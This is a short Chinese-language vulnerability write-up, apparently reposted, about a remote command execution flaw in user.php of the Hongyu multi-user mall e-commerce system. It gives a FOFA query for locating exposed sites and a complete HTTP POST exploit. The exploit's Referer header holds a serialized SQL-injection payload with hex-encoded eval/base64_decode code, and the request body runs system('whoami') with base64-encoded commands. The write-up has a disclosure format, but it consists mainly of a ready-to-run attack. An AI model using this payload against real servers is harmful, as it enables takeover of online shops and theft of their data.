登录 白背景

鸿宇多用户商城user.php存在远程命令执行漏洞

一、漏洞简介

鸿宇多用户商城系统是一款B2B2C新零售电商系统。鸿宇多用户商城user.php存在远程命令执行漏洞,攻击者可利用该漏洞获取服务器权限。

二、影响版本

  • 鸿宇多用户商城系统

三、资产测绘

  • fofabody="content=HongYuJD" && body="68ecshopcom_360buy"
  • 特征

image.png

四、漏洞复现

POST /user.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Accept-Encoding: gzip
Connection: close
 
action=login&rick={{base64(echo(system("whoami"));)}}

命令需要base64编码
image.png
hydyhsc-user-rce.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/qh686h4nd50asgvs